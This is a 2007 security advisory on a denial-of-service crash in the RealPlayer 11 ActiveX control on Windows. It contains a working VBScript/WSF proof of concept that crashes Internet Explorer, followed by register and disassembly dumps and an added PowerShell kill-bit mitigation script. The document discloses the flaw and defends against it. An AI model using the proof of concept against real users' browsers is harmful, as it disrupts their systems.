
| Subject: | DOS in Realplayer 11 ActiveX on Win Vista and Win XP SP2 |
|---|---|
| Date: | 29 Nov 2007 23:34:50 -0000 |
```text
+-----------------------------------------------------------------.
Affected : Realplayer 11 ActiveX on Win Vista and Win XP SP2       :
Type     : DOS Attack                                              :
Date     : 28-11-2007                                              :
Author   : Adonis, Abed                                            :
Link     : http://www.safehack.com/Advisory/realpdos.txt           :
+-----------------------------------------------------------------.

+-------------.
Brief History \
+---------------`-------------------------------------------------.

GetSourceTransport() fails to handle exceptional conditions, which
leads to a DoS (Denial of Service) attack.

GetSourceTransport() is found in rmoc3260.dll which is installed
with RealPlayer 11.

Note: This ActiveX can be loaded by IE or any other browser.

Successful exploitation will lead to a remote crash in IE 6/7.

+-----------.
The Problem \
+-------------`---------------------------------------------------.

RealPlayer 11 ActiveX DoS Proof-of-Concept

-:PoC:-
1- Copy and paste the following code into filepoc.wsf
2- Run it by double clicking on it

---------------------------------------------------snip-----------
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\system32\rmoc3260.dll"
prototype = "Function GetSourceTransport ( ByVal nSourceNum As Integer ) As String"
memberName = "GetSourceTransport"
progid = "RealAudioObjects.RealAudio"
argCount = 1
arg1=32767
target.GetSourceTransport arg1
</script></job></package>
---------------------------------------------------snip-----------

Registers:
--------------------------------------------------
EIP 637F4A02 -> 00000000
EAX 0022EC44 -> 00000000
EBX 663CCB38 -> 663B7400 -> Uni: t;ft;f
ECX 0022EC44 -> 00000000
EDX 01536388 -> 638416B8
EDI 00000000
ESI 00000000
EBP 0022EC68 -> 0022EC78
ESP 0022EC3C -> 00000000

Block Disassembly:
--------------------------------------------------
637F49F2 JE SHORT 637F49F8
637F49F4 MOV ESI,EAX
637F49F6 JMP SHORT 637F49FA
637F49F8 XOR ESI,ESI
637F49FA LEA ECX,[EBP-24]
637F49FD CALL 6381C1F0
637F4A02 MOV EDX,[ESI]        <--- CRASH
637F4A04 LEA EAX,[EBP-4]
637F4A07 PUSH EAX
637F4A08 PUSH 638427D8
637F4A0D PUSH ESI
637F4A0E CALL [EDX]
637F4A10 MOV EAX,[EBP+8]
637F4A13 SUB EAX,46
637F4A16 JE 637F4B28

Stack Dump:
--------------------------------------------------
22EC3C 00 00 00 00 F4 EC 22 00 00 00 00 00 F4 EC 22 07 [................]
22EC4C C0 6D 53 01 00 00 00 00 30 ED 22 00 00 00 00 00 [.mS.............]
22EC5C 00 00 00 00 DC 9A 2B 00 00 00 00 00 78 EC 22 00 [................]
22EC6C A8 C7 7F 63 47 00 00 00 FF 7F 00 00 90 EC 22 00 [...cG...........]
22EC7C 8E 48 3B 66 88 63 53 01 47 00 00 00 FF 7F 00 00 [.H.f.cS.G.......]

Peace to you all and Happy New Year full of health and Peace
+-----------------------------------------------------------------.
```
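The advisory notes that the control can be instantiated by IE or any other browser. The standard defender's response while waiting for a vendor fix is to set the Internet Explorer "kill bit" on the control's CLSID so IE refuses to load it from a page. The script below is an added example, not part of the advisory: the CLSID is the one from the PoC's `classid` attribute, while the registry location and the `0x400` flag value are Microsoft's documented kill-bit mechanism (KB240797), which the advisory itself does not mention. It assumes an elevated PowerShell prompt on the affected Windows host.

```powershell
# Added example: set the IE kill bit for the RealPlayer ActiveX control from the
# advisory's PoC so a web page can no longer instantiate it. Mechanism per KB240797:
# HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}
#   "Compatibility Flags" (REG_DWORD) with bit 0x400 (COMPAT_EVIL_DONT_LOAD) set.
# Run elevated. Does not uninstall RealPlayer; it only blocks the control in IE.

$Clsid   = '{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}'   # from the PoC's classid
$KillBit = 0x400

# 32-bit IE on 64-bit Windows reads the Wow6432Node view; only touch views that exist
# so we do not create a spurious Wow6432Node tree on 32-bit systems.
$Bases = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
) | Where-Object { Test-Path $_ }

function Set-KillBit {
    param([string]$Base, [string]$Id)
    $key = Join-Path $Base $Id
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    # OR the bit in so any flags already present on this CLSID are preserved.
    $existing = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                 -ErrorAction SilentlyContinue).'Compatibility Flags'
    $flags = [int]$existing -bor $KillBit
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $flags -Type DWord
}

function Test-KillBit {
    # Returns $true only when the kill bit is present for the CLSID in this view.
    param([string]$Base, [string]$Id)
    $key = Join-Path $Base $Id
    if (-not (Test-Path $key)) { return $false }
    $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    return (([int]$flags -band $KillBit) -eq $KillBit)
}

foreach ($b in $Bases) {
    Set-KillBit  -Base $b -Id $Clsid
    '{0}: kill bit set = {1}' -f $b, (Test-KillBit -Base $b -Id $Clsid)
}
```

Verify afterwards by loading a page that references the CLSID: IE should show the control as blocked rather than instantiating rmoc3260.dll. Remove the value (or clear bit 0x400) once a patched RealPlayer build is deployed.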